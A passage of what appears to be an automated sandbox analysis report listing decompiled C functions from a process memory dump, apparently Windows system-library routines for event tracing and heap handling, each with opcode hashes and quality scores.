            				E044EAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
            				if(E04447D50() == 0) {
            					_t16 = 0x7ffe0388;
            				} else {
            					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
            				}
            				if( *_t16 != 0) {
            					_t16 = E044DFE3F(_t22, _t35, _v8, _v12);
            				}
            				return _t16;
            			}












            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • Opcode ID: 94384b3961e12387fd9505e98bbf6274b7427540507170a704a34375b1d1de07
            • Instruction ID: 21f544a1b6bf65a53128d90e72895d521a12f5e1b2c51a7367c3b495d0d8fcb3
            • Opcode Fuzzy Hash: 94384b3961e12387fd9505e98bbf6274b7427540507170a704a34375b1d1de07
            • Instruction Fuzzy Hash: A601F572504741DFEB20EB29CD40B1A77E5AB84314F04852AF98693691EE34E845DB92
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0443B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
            				signed char _t11;
            				signed char* _t12;
            				intOrPtr _t24;
            				signed short* _t25;
            
            				_t25 = __edx;
            				_t24 = __ecx;
            				_t11 = ( *[fs:0x30])[0x50];
            				if(_t11 != 0) {
            					if( *_t11 == 0) {
            						goto L1;
            					}
            					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
            					L2:
            					if( *_t12 != 0) {
            						_t12 =  *[fs:0x30];
            						if((_t12[0x240] & 0x00000004) == 0) {
            							goto L3;
            						}
            						if(E04447D50() == 0) {
            							_t12 = 0x7ffe0385;
            						} else {
            							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
            						}
            						if(( *_t12 & 0x00000020) == 0) {
            							goto L3;
            						}
            						return E044A7016(_a4, _t24, 0, 0, _t25, 0);
            					}
            					L3:
            					return _t12;
            				}
            				L1:
            				_t12 = 0x7ffe0384;
            				goto L2;
            			}








            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
            • Instruction ID: d27e8f494c14daa7ef30969edba473a4dff671a8ada04a42ba9595892e25dc8b
            • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
            • Instruction Fuzzy Hash: 5601B1312045C09FDB22DB1DC844F6B77E8EB85B54F0940A7E915DB752D668FC41CA20
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 59%
            			E044DFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
            				signed int _v12;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				intOrPtr _v32;
            				short _v58;
            				char _v64;
            				void* __edi;
            				void* __esi;
            				signed char* _t18;
            				intOrPtr _t24;
            				intOrPtr _t30;
            				intOrPtr _t31;
            				signed int _t32;
            
            				_t29 = __edx;
            				_t24 = __ebx;
            				_v12 =  *0x451d360 ^ _t32;
            				_t30 = __edx;
            				_t31 = __ecx;
            				E0446FA60( &_v64, 0, 0x30);
            				_v24 = _a4;
            				_v32 = _t31;
            				_v28 = _t30;
            				_v58 = 0x267;
            				if(E04447D50() == 0) {
            					_t18 = 0x7ffe0388;
            				} else {
            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
            				}
            				_push( &_v64);
            				_push(0x10);
            				_push(0x20402);
            				_push( *_t18 & 0x000000ff);
            				return E0446B640(E04469AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
            			}

















            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • Opcode ID: 62e878c1bb7df0030c1dfb9bb0022ff1e89cf83fe87d0140069e649ef4e7721e
            • Instruction ID: 23609073f70ed7f27f580d001bea92b8aa3150b93b2b8e2f3263ea64cce52987
            • Opcode Fuzzy Hash: 62e878c1bb7df0030c1dfb9bb0022ff1e89cf83fe87d0140069e649ef4e7721e
            • Instruction Fuzzy Hash: FE018471E00258ABEF14DFA9D845FAEB7B8EF44704F00406BB901EB391DA74AA05C795
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 59%
            			E044DFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
            				signed int _v12;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				intOrPtr _v32;
            				short _v58;
            				char _v64;
            				void* __edi;
            				void* __esi;
            				signed char* _t18;
            				intOrPtr _t24;
            				intOrPtr _t30;
            				intOrPtr _t31;
            				signed int _t32;
            
            				_t29 = __edx;
            				_t24 = __ebx;
            				_v12 =  *0x451d360 ^ _t32;
            				_t30 = __edx;
            				_t31 = __ecx;
            				E0446FA60( &_v64, 0, 0x30);
            				_v24 = _a4;
            				_v32 = _t31;
            				_v28 = _t30;
            				_v58 = 0x266;
            				if(E04447D50() == 0) {
            					_t18 = 0x7ffe0388;
            				} else {
            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
            				}
            				_push( &_v64);
            				_push(0x10);
            				_push(0x20402);
            				_push( *_t18 & 0x000000ff);
            				return E0446B640(E04469AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
            			}

















            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • Opcode ID: 905fc82b340dc833f3264b00f4c3b3b0f55d4b3c2718b709cb13ba6080b671a7
            • Instruction ID: e69257334281b1962cac6cd9d56362a980e3ce46f49f65f64c5523ce510c02ca
            • Opcode Fuzzy Hash: 905fc82b340dc833f3264b00f4c3b3b0f55d4b3c2718b709cb13ba6080b671a7
            • Instruction Fuzzy Hash: 97018F71E00258ABDF14DFA9D845FAFBBB8EF44704F00406BB901EB391EA74AA05C795
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 54%
            			E044F8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
            				signed int _v12;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				intOrPtr _v32;
            				intOrPtr _v36;
            				intOrPtr _v40;
            				short _v66;
            				char _v72;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				signed char* _t18;
            				signed int _t32;
            
            				_t29 = __edx;
            				_v12 =  *0x451d360 ^ _t32;
            				_t31 = _a8;
            				_t30 = _a12;
            				_v66 = 0x1c20;
            				_v40 = __ecx;
            				_v36 = __edx;
            				_v32 = _a4;
            				_v28 = _a8;
            				_v24 = _a12;
            				if(E04447D50() == 0) {
            					_t18 = 0x7ffe0386;
            				} else {
            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
            				}
            				_push( &_v72);
            				_push(0x14);
            				_push(0x20402);
            				_push( *_t18 & 0x000000ff);
            				return E0446B640(E04469AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
            			}

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • Opcode ID: 924d4e22a5edca21e3f6d86eb329e93cb7d8d56d51cfcb01aaab019251590af0
            • Instruction ID: 91e06577433c9dbc4b5a9c4170577bd68cb8b9ecd20635aae1931b2416e9cb7b
            • Opcode Fuzzy Hash: 924d4e22a5edca21e3f6d86eb329e93cb7d8d56d51cfcb01aaab019251590af0
            • Instruction Fuzzy Hash: A1011EB1A002199FDB00DFA9D9419AEB7B8EF48314F10405BF905E7351D734A901CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 54%
            			E044F8ED6(intOrPtr __ecx, intOrPtr __edx) {
            				signed int _v8;
            				signed int _v12;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				intOrPtr _v32;
            				intOrPtr _v36;
            				short _v62;
            				char _v68;
            				signed char* _t29;
            				intOrPtr _t35;
            				intOrPtr _t41;
            				intOrPtr _t42;
            				signed int _t43;
            
            				_t40 = __edx;
            				_v8 =  *0x451d360 ^ _t43;
            				_v28 = __ecx;
            				_v62 = 0x1c2a;
            				_v36 =  *((intOrPtr*)(__edx + 0xc8));
            				_v32 =  *((intOrPtr*)(__edx + 0xcc));
            				_v20 =  *((intOrPtr*)(__edx + 0xd8));
            				_v16 =  *((intOrPtr*)(__edx + 0xd4));
            				_v24 = __edx;
            				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
            				if(E04447D50() == 0) {
            					_t29 = 0x7ffe0386;
            				} else {
            					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
            				}
            				_push( &_v68);
            				_push(0x1c);
            				_push(0x20402);
            				_push( *_t29 & 0x000000ff);
            				return E0446B640(E04469AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
            			}

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • Opcode ID: dc46be4d765adc7f04a8514741479600c4eb5d64a679dda6fee531e677fdc103
            • Instruction ID: eb18f41b02db5caddd24f250c7c2058d8cf45cc93cf8febef9aff266869d173f
            • Opcode Fuzzy Hash: dc46be4d765adc7f04a8514741479600c4eb5d64a679dda6fee531e677fdc103
            • Instruction Fuzzy Hash: 0B110C70A002599FDB04DFA9D441AAEB7F4FB08300F0442AAE519EB382E634A941CB91
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0442DB60(signed int __ecx) {
            				intOrPtr* _t9;
            				void* _t12;
            				void* _t13;
            				intOrPtr _t14;
            
            				_t9 = __ecx;
            				_t14 = 0;
            				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
            					_t13 = 0xc000000d;
            				} else {
            					_t14 = E0442DB40();
            					if(_t14 == 0) {
            						_t13 = 0xc0000017;
            					} else {
            						_t13 = E0442E7B0(__ecx, _t12, _t14, 0xfff);
            						if(_t13 < 0) {
            							L0442E8B0(__ecx, _t14, 0xfff);
            							L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
            							_t14 = 0;
            						} else {
            							_t13 = 0;
            							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
            						}
            					}
            				}
            				 *_t9 = _t14;
            				return _t13;
            			}

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
            • Instruction ID: 229562081f89542b6ec3f2baf5eda221c7a789226c300f600f972fe3b5f2bc77
            • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
            • Instruction Fuzzy Hash: B7F04C73A005329FEF322A564AA0F5BBE959FC2B60F65003FF2049B345CA60BC0396D4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0442B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
            				signed char* _t13;
            				intOrPtr _t22;
            				char _t23;
            
            				_t23 = __edx;
            				_t22 = __ecx;
            				if(E04447D50() != 0) {
            					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
            				} else {
            					_t13 = 0x7ffe0384;
            				}
            				if( *_t13 != 0) {
            					_t13 =  *[fs:0x30];
            					if((_t13[0x240] & 0x00000004) == 0) {
            						goto L3;
            					}
            					if(E04447D50() == 0) {
            						_t13 = 0x7ffe0385;
            					} else {
            						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
            					}
            					if(( *_t13 & 0x00000020) == 0) {
            						goto L3;
            					}
            					return E044A7016(0x14a4, _t22, _t23, _a4, _a8, 0);
            				} else {
            					L3:
            					return _t13;
            				}
            			}

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
            • Instruction ID: 4d07b9b7aafb1a1abfa5b3e452e5a846912bdd516d5bf179be784bb4ac8c37ed
            • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
            • Instruction Fuzzy Hash: DB01DB323006909BDB325B59C904F6ABB98EF51754F090467F9148B771E674F801C224
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 46%
            			E044BFE87(intOrPtr __ecx) {
            				signed int _v8;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				signed int _v24;
            				intOrPtr _v28;
            				short _v54;
            				char _v60;
            				signed char* _t21;
            				intOrPtr _t27;
            				intOrPtr _t32;
            				intOrPtr _t33;
            				intOrPtr _t34;
            				signed int _t35;
            
            				_v8 =  *0x451d360 ^ _t35;
            				_v16 = __ecx;
            				_v54 = 0x1722;
            				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
            				_v28 =  *((intOrPtr*)(__ecx + 4));
            				_v20 =  *((intOrPtr*)(__ecx + 0xc));
            				if(E04447D50() == 0) {
            					_t21 = 0x7ffe0382;
            				} else {
            					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
            				}
            				_push( &_v60);
            				_push(0x10);
            				_push(0x20402);
            				_push( *_t21 & 0x000000ff);
            				return E0446B640(E04469AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
            			}

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • Opcode ID: 257d8fc387513d38444d4498cf874636678e53b3d5e5558bf32f03ef4db58002
            • Instruction ID: 58e78442ce45e161b6f79be3be774f15c4042ed9a9bdf33a0f0c61f3e2bb7ec4
            • Opcode Fuzzy Hash: 257d8fc387513d38444d4498cf874636678e53b3d5e5558bf32f03ef4db58002
            • Instruction Fuzzy Hash: C5016270A00248AFDF14DFA9D941A6EB7F4FF04304F10415AA549DB392DA35EA06DB91
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 48%
            			E044F8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
            				signed int _v8;
            				intOrPtr _v12;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				short _v50;
            				char _v56;
            				signed char* _t18;
            				intOrPtr _t24;
            				intOrPtr _t30;
            				intOrPtr _t31;
            				signed int _t32;
            
            				_t29 = __edx;
            				_v8 =  *0x451d360 ^ _t32;
            				_v16 = __ecx;
            				_v50 = 0x1c2c;
            				_v24 = _a4;
            				_v20 = _a8;
            				_v12 = __edx;
            				if(E04447D50() == 0) {
            					_t18 = 0x7ffe0386;
            				} else {
            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
            				}
            				_push( &_v56);
            				_push(0x10);
            				_push(0x402);
            				_push( *_t18 & 0x000000ff);
            				return E0446B640(E04469AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
            			}

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • Opcode ID: 49caf55f56ccc7594d370fb61953db93d14492a5ad5d363b878079a427cf272d
            • Instruction ID: ce0a2d4848b91883f7c81a1097347ee0c6fcb2ab159e5b8a6f1a6c83d4e7c819
            • Opcode Fuzzy Hash: 49caf55f56ccc7594d370fb61953db93d14492a5ad5d363b878079a427cf272d
            • Instruction Fuzzy Hash: 13013174A00249AFDF00EFA9D945AAEB7F4EF48300F10445AB905EB381EB74EA00DB95
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 48%
            			E044E131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
            				signed int _v8;
            				intOrPtr _v12;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				short _v50;
            				char _v56;
            				signed char* _t18;
            				intOrPtr _t24;
            				intOrPtr _t30;
            				intOrPtr _t31;
            				signed int _t32;
            
            				_t29 = __edx;
            				_v8 =  *0x451d360 ^ _t32;
            				_v20 = _a4;
            				_v12 = _a8;
            				_v24 = __ecx;
            				_v16 = __edx;
            				_v50 = 0x1021;
            				if(E04447D50() == 0) {
            					_t18 = 0x7ffe0380;
            				} else {
            					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
            				}
            				_push( &_v56);
            				_push(0x10);
            				_push(0x20402);
            				_push( *_t18 & 0x000000ff);
            				return E0446B640(E04469AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
            			}

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • Opcode ID: 3d7fc24271d94f6a7186013526c2a28f83569b5106a9567aa759079c2d182d81
            • Instruction ID: a4f0e382876b07918875cd880251519b8068e0b1a20bb0dce8bbd675d2e4aa6f
            • Opcode Fuzzy Hash: 3d7fc24271d94f6a7186013526c2a28f83569b5106a9567aa759079c2d182d81
            • Instruction Fuzzy Hash: 730181B0A00248AFDF00DFA9D505AAEB7F4FF08300F00405AB845EB341EA34AA00CB51
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0444C577(void* __ecx, char _a4) {
            				void* __esi;
            				void* __ebp;
            				void* _t17;
            				void* _t19;
            				void* _t20;
            				void* _t21;
            
            				_t18 = __ecx;
            				_t21 = __ecx;
            				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0444C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x44011cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
            					__eflags = _a4;
            					if(__eflags != 0) {
            						L10:
            						E044F88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
            						L9:
            						return 0;
            					}
            					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
            					if(__eflags == 0) {
            						goto L10;
            					}
            					goto L9;
            				} else {
            					return 1;
            				}
            			}

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • Opcode ID: 095e4cfd69469dca64be601aad615de6906384a8733b2b003bfdde1c1ee3bfdd
            • Instruction ID: 2dd264889d00e45cdc2ce27bdbac37f6f998fd9176f7416193cc1c8fdf5939c8
            • Opcode Fuzzy Hash: 095e4cfd69469dca64be601aad615de6906384a8733b2b003bfdde1c1ee3bfdd
            • Instruction Fuzzy Hash: 62F06DB29176B0DAFF359A148484B2B7BD49B85764F4E846BD40587242E6B4F880C251
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 94%
            			E044E2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
            				void* __esi;
            				signed char _t3;
            				signed char _t7;
            				void* _t19;
            
            				_t17 = __ecx;
            				_t3 = E044DFD22(__ecx);
            				_t19 =  *0x451849c - _t3; // 0x0
            				if(_t19 == 0) {
            					__eflags = _t17 -  *0x4518748; // 0x0
            					if(__eflags <= 0) {
            						E044E1C06();
            						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
            						__eflags = _t3;
            						if(_t3 != 0) {
            							L5:
            							__eflags =  *0x4518724 & 0x00000004;
            							if(( *0x4518724 & 0x00000004) == 0) {
            								asm("int3");
            								return _t3;
            							}
            						} else {
            							_t3 =  *0x7ffe02d4 & 0x00000003;
            							__eflags = _t3 - 3;
            							if(_t3 == 3) {
            								goto L5;
            							}
            						}
            					}
            					return _t3;
            				} else {
            					_t7 =  *0x4518724; // 0x0
            					return E044D8DF1(__ebx, 0xc0000374, 0x4515890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
            				}
            			}

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • Opcode ID: 2ff884eb8d862faf7a7cb95a8d146b68a342d4458ebc9acdf323cd2fa99c6f71
            • Instruction ID: 9065f7e409d7252217fbc471eb5f96561b3e3c6eafabefc694e86d83ce42fa3f
            • Opcode Fuzzy Hash: 2ff884eb8d862faf7a7cb95a8d146b68a342d4458ebc9acdf323cd2fa99c6f71
            • Instruction Fuzzy Hash: 20F027264111844BFF327F2720112F22BD9F785119B0904C7D5A117341C8B9AC87EA10
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 43%
            			E044F8D34(intOrPtr __ecx, intOrPtr __edx) {
            				signed int _v8;
            				intOrPtr _v12;
            				intOrPtr _v16;
            				short _v42;
            				char _v48;
            				signed char* _t12;
            				intOrPtr _t18;
            				intOrPtr _t24;
            				intOrPtr _t25;
            				signed int _t26;
            
            				_t23 = __edx;
            				_v8 =  *0x451d360 ^ _t26;
            				_v16 = __ecx;
            				_v42 = 0x1c2b;
            				_v12 = __edx;
            				if(E04447D50() == 0) {
            					_t12 = 0x7ffe0386;
            				} else {
            					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
            				}
            				_push( &_v48);
            				_push(8);
            				_push(0x20402);
            				_push( *_t12 & 0x000000ff);
            				return E0446B640(E04469AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
            			}

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • Opcode ID: e15270a4e66ca35d77d35fbd15a83cf2c1bd7e558fea39ccac5aafeb851c618c
            • Instruction ID: 35a228182f5106b42916db5b827da6e56058ce166c6058e06f1125af872311db
            • Opcode Fuzzy Hash: e15270a4e66ca35d77d35fbd15a83cf2c1bd7e558fea39ccac5aafeb851c618c
            • Instruction Fuzzy Hash: 35F0B470E046489FDF14EFB9D441A6EB7B4EF14300F10809AE906EB391EA34F900C755
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 54%
            			E0446927A(void* __ecx) {
            				signed int _t11;
            				void* _t14;
            
            				_t11 = L04444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
            				if(_t11 != 0) {
            					E0446FA60(_t11, 0, 0x98);
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
            					 *((intOrPtr*)(_t11 + 0x24)) = 1;
            					E044692C6(_t11, _t14);
            				}
            				return _t11;
            			}

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
            • Instruction ID: a03199cce3f87dd19a4b8382b795583bb1cec640e67b3d936582df12fb7cbd23
            • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
            • Instruction Fuzzy Hash: 3DE0E5B23405006BEB519E06DC80B137659AF82724F00407EB5011E243C6F5E80887A0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 88%
            			E0444746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
            				signed int _t8;
            				void* _t10;
            				short* _t17;
            				void* _t19;
            				intOrPtr _t20;
            				void* _t21;
            
            				_t20 = __esi;
            				_t19 = __edi;
            				_t17 = __ebx;
            				if( *((char*)(_t21 - 0x25)) != 0) {
            					if(__ecx == 0) {
            						E0443EB70(__ecx, 0x45179a0);
            					} else {
            						asm("lock xadd [ecx], eax");
            						if((_t8 | 0xffffffff) == 0) {
            							_push( *((intOrPtr*)(__ecx + 4)));
            							E044695D0();
            							L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
            							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
            							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
            						}
            					}
            					L10:
            				}
            				_t10 = _t19 + _t19;
            				if(_t20 >= _t10) {
            					if(_t19 != 0) {
            						 *_t17 = 0;
            						return 0;
            					}
            				}
            				return _t10;
            				goto L10;
            			}

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • Opcode ID: dcc67ba3804e30a64a52685fb0ee8197b342f748bf0c4301ed2f45737613051c
            • Instruction ID: 728d804faec5cfa67cd0416c3fce6b987dd0dec310f09f89f7fad570a012a701
            • Opcode Fuzzy Hash: dcc67ba3804e30a64a52685fb0ee8197b342f748bf0c4301ed2f45737613051c
            • Instruction Fuzzy Hash: BEF0E934600144AAFF219B6CC441B7A7F71AF84318F14056BD451A7261F764F803C785
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 36%
            			E044F8CD6(intOrPtr __ecx) {
            				signed int _v8;
            				intOrPtr _v12;
            				short _v38;
            				char _v44;
            				signed char* _t11;
            				intOrPtr _t17;
            				intOrPtr _t22;
            				intOrPtr _t23;
            				intOrPtr _t24;
            				signed int _t25;
            
            				_v8 =  *0x451d360 ^ _t25;
            				_v12 = __ecx;
            				_v38 = 0x1c2d;
            				if(E04447D50() == 0) {
            					_t11 = 0x7ffe0386;
            				} else {
            					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
            				}
            				_push( &_v44);
            				_push(0xffffffe4);
            				_push(0x402);
            				_push( *_t11 & 0x000000ff);
            				return E0446B640(E04469AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
            			}

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: fdc0da87c1009b7d0a1329b09c8e8b4aa5afb9638428a0d5f5407ae05e678cd4
            • Instruction ID: 045f13d496b07e312ae33aaa6e950d59489485952175c2f8e6cf13ed8c47093c
            • Opcode Fuzzy Hash: fdc0da87c1009b7d0a1329b09c8e8b4aa5afb9638428a0d5f5407ae05e678cd4
            • Instruction Fuzzy Hash: 85F0E270A04248ABEF00EBA9E845E6E77B4EF08304F10019AE902EB381EA34F900C755
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 36%
            			E044F8B58(intOrPtr __ecx) {
            				signed int _v8;
            				intOrPtr _v20;
            				short _v46;
            				char _v52;
            				signed char* _t11;
            				intOrPtr _t17;
            				intOrPtr _t22;
            				intOrPtr _t23;
            				intOrPtr _t24;
            				signed int _t25;
            
